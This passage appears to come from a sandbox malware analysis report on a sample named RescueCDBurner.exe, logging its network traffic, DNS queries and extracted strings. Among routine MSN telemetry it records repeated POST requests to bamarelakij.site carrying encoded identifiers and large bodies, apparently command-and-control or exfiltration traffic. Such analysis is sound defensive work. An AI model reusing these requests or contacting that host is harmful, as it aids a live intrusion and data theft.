Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201107291&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 3856sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; _EDGE_S=F=1&SID=3A3B7FB8C795636D2C5D6AD4C6106231; _EDGE_V=1
Source: global trafficHTTP traffic detected: GET /b2?rn=1736201107294&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=04956DB2EAC862DE2FFB78DEEBAA63F6&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=10A5c11b12c97664656d6bc1736201107; XID=10A5c11b12c97664656d6bc1736201107
Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1736201107293&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b231fc407e8e42d98aaddb9cf46080a1&activityId=b231fc407e8e42d98aaddb9cf46080a1&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=E04C6472ECD84BAC8F19BD5E6C9ADC9E&MUID=04956DB2EAC862DE2FFB78DEEBAA63F6 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; _EDGE_S=F=1&SID=3A3B7FB8C795636D2C5D6AD4C6106231; _EDGE_V=1; SM=T
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201109258&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 10929sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; _EDGE_S=F=1&SID=3A3B7FB8C795636D2C5D6AD4C6106231; _EDGE_V=1
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201109269&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 31919sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; _EDGE_S=F=1&SID=3A3B7FB8C795636D2C5D6AD4C6106231; _EDGE_V=1; _C_ETH=1; msnup=
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201109885&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 5379sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; _EDGE_S=F=1&SID=3A3B7FB8C795636D2C5D6AD4C6106231; _EDGE_V=1; msnup=
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201110262&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 9878sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; _EDGE_S=F=1&SID=3A3B7FB8C795636D2C5D6AD4C6106231; _EDGE_V=1; msnup=
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQContent-Length: 103796Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQContent-Length: 745Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQContent-Length: 212Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQContent-Length: 380Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQContent-Length: 58769Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQContent-Length: 69740Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15Content-Length: 147Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQContent-Length: 35Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQContent-Length: 53Host: bamarelakij.site
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.50
Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.50
Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.50
Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.50
Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.50
Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.50
Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /b?rn=1736201107294&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=04956DB2EAC862DE2FFB78DEEBAA63F6&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /b2?rn=1736201107294&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=04956DB2EAC862DE2FFB78DEEBAA63F6&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=10A5c11b12c97664656d6bc1736201107; XID=10A5c11b12c97664656d6bc1736201107
Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1736201107293&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b231fc407e8e42d98aaddb9cf46080a1&activityId=b231fc407e8e42d98aaddb9cf46080a1&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=E04C6472ECD84BAC8F19BD5E6C9ADC9E&MUID=04956DB2EAC862DE2FFB78DEEBAA63F6 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; _EDGE_S=F=1&SID=3A3B7FB8C795636D2C5D6AD4C6106231; _EDGE_V=1; SM=T
Source: RescueCDBurner.exe, 00000002.00000002.1716689796.000000006C7E9000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: B}lQLocalSocketPrivate::completeAsyncReadQLocalSocketPrivate::startAsyncReadQLocalSocket::waitForReadyRead WaitForSingleObject failed with error code %d.\\.\pipe\QLocalSocket::connectToServer%1: %2QLocalServerPrivate::addListener1_q_onNewConnection()QLocalServerPrivate::_q_onNewConnectione-islem.kktcmerkezbankasi.org2148*.EGO.GOV.TR2087MD5 Collisions Inc. (http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0Digisign Server ID - (Enrich)1276011370Digisign Server ID (Enrich)12000170511846442971184640175DigiNotar Public CA 20251e:7d:7a:53:3d:45:30:41:96:40:0f:71:48:1f:45:04DigiNotar Extended Validation CAd6:d0:29:77:f1:49:fd:1a:83:f2:b9:ea:94:8c:5c:b4DigiNotar PKIoverheid CA Organisatie - G220001983DigiNotar PKIoverheid CA Overheid en Bedrijven20015536120000515120000505DigiNotar Cyber CA1200005251184640176DigiNotar Qualified CA5b:d5:60:9c:64:17:68:cf:21:0e:35:fd:fb:05:ad:41CertiID Enterprise Certificate Authoritya4:b6:ce:e3:2e:d3:35:46:26:3c:b3:55:3a:a8:92:21DigiNotar Root CA G20a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3eDigiNotar Services 1024 CA36:16:71:55:43:42:1b:9d:e6:cb:a3:64:41:df:24:38DigiNotar Services CAf1:4a:13:f4:87:2b:56:dc:39:df:84:ca:7a:a1:06:49DigiNotar Root CA0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4c*.google.com05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56global trusteed8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0login.live.comb0:b7:13:3e:d0:96:f9:b5:6f:ae:91:c8:74:bd:3a:c0addons.mozilla.org92:39:d5:34:8f:40:d1:69:5a:74:54:70:e1:f2:3f:43login.skype.come9:02:8b:95:78:e4:15:dc:1a:71:0a:2b:88:15:44:473e:75:ce:d4:6b:69:30:21:21:88:30:ae:86:a8:2a:7139:2a:43:4f:0e:07:df:1f:8a:a3:05:de:34:e0:c2:29login.yahoo.comd7:55:8f:da:f5:f1:10:5b:b2:13:28:2b:70:77:29:a3www.google.comf5:c8:6a:f3:61:62:f1:3a:64:f5:4f:6d:c9:58:7c:06mail.google.com04:7e:cb:e9:fc:a5:5f:7b:d0:9e:ae:36:e1:0c:ae:1eSTOULCNOStateOrProvinceNameOrganizationalUnitNameLocalityNameCountryNameCommonNameOrganizationQMap(-----END CERTIFICATE----- equals www.yahoo.com (Yahoo)
Source: RescueCDBurner.exe, 00000003.00000002.1777743809.000000006CD59000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: lQLocalSocketPrivate::completeAsyncReadQLocalSocketPrivate::startAsyncReadQLocalSocket::waitForReadyRead WaitForSingleObject failed with error code %d.\\.\pipe\QLocalSocket::connectToServer%1: %2QLocalServerPrivate::addListener1_q_onNewConnection()QLocalServerPrivate::_q_onNewConnectione-islem.kktcmerkezbankasi.org2148*.EGO.GOV.TR2087MD5 Collisions Inc. (http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0Digisign Server ID - (Enrich)1276011370Digisign Server ID (Enrich)12000170511846442971184640175DigiNotar Public CA 20251e:7d:7a:53:3d:45:30:41:96:40:0f:71:48:1f:45:04DigiNotar Extended Validation CAd6:d0:29:77:f1:49:fd:1a:83:f2:b9:ea:94:8c:5c:b4DigiNotar PKIoverheid CA Organisatie - G220001983DigiNotar PKIoverheid CA Overheid en Bedrijven20015536120000515120000505DigiNotar Cyber CA1200005251184640176DigiNotar Qualified CA5b:d5:60:9c:64:17:68:cf:21:0e:35:fd:fb:05:ad:41CertiID Enterprise Certificate Authoritya4:b6:ce:e3:2e:d3:35:46:26:3c:b3:55:3a:a8:92:21DigiNotar Root CA G20a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3eDigiNotar Services 1024 CA36:16:71:55:43:42:1b:9d:e6:cb:a3:64:41:df:24:38DigiNotar Services CAf1:4a:13:f4:87:2b:56:dc:39:df:84:ca:7a:a1:06:49DigiNotar Root CA0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4c*.google.com05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56global trusteed8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0login.live.comb0:b7:13:3e:d0:96:f9:b5:6f:ae:91:c8:74:bd:3a:c0addons.mozilla.org92:39:d5:34:8f:40:d1:69:5a:74:54:70:e1:f2:3f:43login.skype.come9:02:8b:95:78:e4:15:dc:1a:71:0a:2b:88:15:44:473e:75:ce:d4:6b:69:30:21:21:88:30:ae:86:a8:2a:7139:2a:43:4f:0e:07:df:1f:8a:a3:05:de:34:e0:c2:29login.yahoo.comd7:55:8f:da:f5:f1:10:5b:b2:13:28:2b:70:77:29:a3www.google.comf5:c8:6a:f3:61:62:f1:3a:64:f5:4f:6d:c9:58:7c:06mail.google.com04:7e:cb:e9:fc:a5:5f:7b:d0:9e:ae:36:e1:0c:ae:1eSTOULCNOStateOrProvinceNameOrganizationalUnitNameLocalityNameCountryNameCommonNameOrganizationQMap(-----END CERTIFICATE----- equals www.yahoo.com (Yahoo)
Source: global trafficDNS traffic detected: DNS query: bamarelakij.site
Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global trafficDNS traffic detected: DNS query: assets.msn.com
Source: global trafficDNS traffic detected: DNS query: c.msn.com
Source: global trafficDNS traffic detected: DNS query: api.msn.com
